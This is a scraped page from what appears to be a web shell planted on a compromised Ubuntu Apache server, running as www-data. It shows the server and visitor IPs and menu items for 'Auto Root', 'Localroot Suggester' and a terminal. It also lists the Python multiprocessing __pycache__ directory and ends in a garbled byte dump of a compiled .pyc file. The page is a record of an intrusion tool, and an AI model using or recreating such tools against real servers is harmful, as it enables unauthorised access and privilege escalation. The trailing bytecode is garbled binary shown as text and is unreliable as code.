Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.10 /
multiprocessing /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-310.pyc
669
B
-rw-r--r--
2026-07-07 06:44
connection.cpython-310.pyc
24.97
KB
-rw-r--r--
2026-07-07 06:44
context.cpython-310.pyc
12.55
KB
-rw-r--r--
2026-07-07 06:44
forkserver.cpython-310.pyc
8.23
KB
-rw-r--r--
2026-07-07 06:44
heap.cpython-310.pyc
7.49
KB
-rw-r--r--
2026-07-07 06:44
managers.cpython-310.pyc
39.81
KB
-rw-r--r--
2026-07-07 06:44
pool.cpython-310.pyc
24.61
KB
-rw-r--r--
2026-07-07 06:44
popen_fork.cpython-310.pyc
2.46
KB
-rw-r--r--
2026-07-07 06:44
popen_forkserver.cpython-310.pyc
2.41
KB
-rw-r--r--
2026-07-07 06:44
popen_spawn_posix.cpython-310.pyc
2.29
KB
-rw-r--r--
2026-07-07 06:44
popen_spawn_win32.cpython-310.pyc
3.39
KB
-rw-r--r--
2026-07-07 06:44
process.cpython-310.pyc
11
KB
-rw-r--r--
2026-07-07 06:44
queues.cpython-310.pyc
10.04
KB
-rw-r--r--
2026-07-07 06:44
reduction.cpython-310.pyc
8.1
KB
-rw-r--r--
2026-07-07 06:44
resource_sharer.cpython-310.pyc
5.18
KB
-rw-r--r--
2026-07-07 06:44
resource_tracker.cpython-310.pyc
5.36
KB
-rw-r--r--
2026-07-07 06:44
shared_memory.cpython-310.pyc
14.14
KB
-rw-r--r--
2026-07-07 06:44
sharedctypes.cpython-310.pyc
6.93
KB
-rw-r--r--
2026-07-07 06:44
spawn.cpython-310.pyc
6.58
KB
-rw-r--r--
2026-07-07 06:44
synchronize.cpython-310.pyc
11.06
KB
-rw-r--r--
2026-07-07 06:44
util.cpython-310.pyc
11.23
KB
-rw-r--r--
2026-07-07 06:44
Save
Rename
o �9j � @ s� d dl Z d dlZd dlZd dlZd dlZddlmZ ddlmZ ddlm Z dgZ ejdkr<e dg7 Z G d d� de�Z n e d g7 Z G dd � d e�ZG dd � d e�Ze� ZejZdS )� N� )�process)� reduction)�util�stop�win32� DupSocketc @ � e Zd ZdZdd� Zdd� ZdS )r zPicklable wrapper for a socket.c s( |� � � � fdd�}t�|� j�| _d S )Nc s � � |�}| �|� d S �N)�share� send_bytes)�conn�pidr ��new_sock� �6/usr/lib/python3.10/multiprocessing/resource_sharer.py�send s z DupSocket.__init__.<locals>.send)�dup�_resource_sharer�register�close�_id)�self�sockr r r r �__init__ s zDupSocket.__init__c C sB t �| j��}|�� }t�|�W d � S 1 sw Y dS )z1Get the socket. This should only be called once.N)r �get_connectionr � recv_bytes�socket� fromshare)r r r r r r �detach$ s $�zDupSocket.detachN��__name__� __module__�__qualname__�__doc__r r r r r r r s �DupFdc @ r )r&